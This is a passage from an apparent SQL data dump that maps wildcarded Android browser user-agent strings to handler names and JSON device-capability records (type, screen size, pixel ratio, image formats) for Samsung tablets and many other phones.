Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T560NU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T560NU) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T710) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T713) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T715) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T719) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":585,\"screenHeight\":780,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T719) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T810) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T813) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":585,\"screenHeight\":780,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T813) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T815) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T819) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T825) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T900) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SMART_G101) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SMART_G102) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SMART_G71) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SMART_Race2_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-03G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-03H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-03J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-04H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SO-04J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SOV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SOV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SOV34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SOV35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SP401) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SP413) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SP511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SP514) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SP531) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SP551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SPEED_S8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SPRINT4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; STARNAUTE4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; STF-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; STF-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; STF-L09S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SUGAR S11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SUPER) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SURF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SX40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SX41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Shoot_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Shoot_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Siragon SP-5150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Sky) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Smart 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Smart8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SmartPRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Smart_Light) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Spark 4 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":12,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SparkSE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Start3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Stellar 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio G3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio J8 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio J8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio J8M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio Mega) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Studio View XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Sunny2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Supreme_Fine) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Supreme_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Swift 2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Swift 2 X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Swift 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; T5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; T500 3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; T5211) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; T5c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; T85) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; TA-1020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 